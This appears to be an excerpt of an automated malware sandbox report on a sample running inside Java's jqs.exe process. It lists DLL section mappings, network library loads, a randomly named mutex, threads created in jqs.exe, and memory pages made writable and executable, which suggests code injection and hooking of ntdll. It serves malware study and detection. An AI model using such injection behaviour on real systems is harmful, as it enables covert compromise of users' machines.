C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll write and read and execute commit 10B0000 151552 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll query and write and read and execute image 6D440000 151552 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D440000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\net.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\net.dll query and write and read and execute image 6D600000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D600000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll write and read and execute commit 10B0000 20480 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll query and write and read and execute image 6D620000 36864 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D620000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll write and read and execute commit 10B0000 278528 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll query and write and read and execute image 6D6A0000 286720 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D6A0000 286720 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll write and read and execute commit 10B0000 32768 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll query and write and read and execute image 6D7A0000 49152 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7A0000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll write and read and execute commit 10B0000 49152 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll query and write and read and execute image 6D7E0000 61440 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7E0000 61440 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\client\classes.jsa query and read commit 10B0000 13369344 own pid readonly success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 13369344 own pid readonly object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll write and read and execute commit 10B0000 1208320 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll query and write and read and execute image 6D000000 1351680 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D000000 1351680 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll write and read and execute commit 10B0000 2695168 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll query and write and read and execute image 6D7F0000 2777088 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7F0000 2777088 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll write and read and execute commit 10B0000 143360 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll query and write and read and execute image 6D1A0000 143360 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1A0000 143360 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll query and write and read and execute image 6D1D0000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1D0000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll write and read and execute commit 10B0000 323584 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll query and write and read and execute image 6D230000 323584 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D230000 323584 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll write and read and execute commit 10B0000 16384 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll query and write and read and execute image 6D280000 32768 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D280000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\java.dll write and read and execute commit 10B0000 126976 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\java.dll query and write and read and execute image 6D320000 126976 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D320000 126976 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe write and read and execute commit 10B0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe query and write and read and execute image 10B0000 147456 own pid read write conflicting addresses 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 147456 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll write and read and execute commit 10B0000 8192 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll query and write and read and execute image 6D420000 24576 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D420000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll write and read and execute commit 10B0000 151552 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll query and write and read and execute image 6D440000 151552 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D440000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\net.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\net.dll query and write and read and execute image 6D600000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D600000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll write and read and execute commit 10B0000 20480 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll query and write and read and execute image 6D620000 36864 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D620000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll write and read and execute commit 10B0000 278528 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll query and write and read and execute image 6D6A0000 286720 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D6A0000 286720 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll write and read and execute commit 10B0000 32768 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll query and write and read and execute image 6D7A0000 49152 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7A0000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll write and read and execute commit 10B0000 49152 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll query and write and read and execute image 6D7E0000 61440 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7E0000 61440 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\client\classes.jsa query and read commit 10B0000 13369344 own pid readonly success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 13369344 own pid readonly object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll write and read and execute commit 10B0000 1208320 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll query and write and read and execute image 6D000000 1351680 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D000000 1351680 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll write and read and execute commit 10B0000 2695168 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll query and write and read and execute image 6D7F0000 2777088 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7F0000 2777088 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll write and read and execute commit 10B0000 143360 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll query and write and read and execute image 6D1A0000 143360 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1A0000 143360 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll query and write and read and execute image 6D1D0000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1D0000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll write and read and execute commit 10B0000 323584 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll query and write and read and execute image 6D230000 323584 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D230000 323584 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll write and read and execute commit 10B0000 16384 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll query and write and read and execute image 6D280000 32768 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D280000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\java.dll write and read and execute commit 10B0000 126976 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\java.dll query and write and read and execute image 6D320000 126976 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D320000 126976 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe write and read and execute commit 10B0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe query and write and read and execute image 10B0000 147456 own pid read write conflicting addresses 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 147456 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll write and read and execute commit 10B0000 8192 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll query and write and read and execute image 6D420000 24576 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D420000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll write and read and execute commit 10B0000 151552 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll query and write and read and execute image 6D440000 151552 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D440000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\net.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\net.dll query and write and read and execute image 6D600000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D600000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll write and read and execute commit 10B0000 20480 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll query and write and read and execute image 6D620000 36864 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D620000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll write and read and execute commit 10B0000 278528 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll query and write and read and execute image 6D6A0000 286720 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D6A0000 286720 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll write and read and execute commit 10B0000 32768 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll query and write and read and execute image 6D7A0000 49152 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7A0000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll write and read and execute commit 10B0000 49152 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll query and write and read and execute image 6D7E0000 61440 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7E0000 61440 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 1E70000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 20A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 22A0000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 22A0000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 22A0000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 22A0000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 22A0000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2376 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
2076 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
1208 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
684 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
2732 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
3228 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
3320 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9078 0s success or wait 764 BAED21A
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
508 C:\Program Files\Java\jre6\bin\jqs.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
508 C:\Program Files\Java\jre6\bin\jqs.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
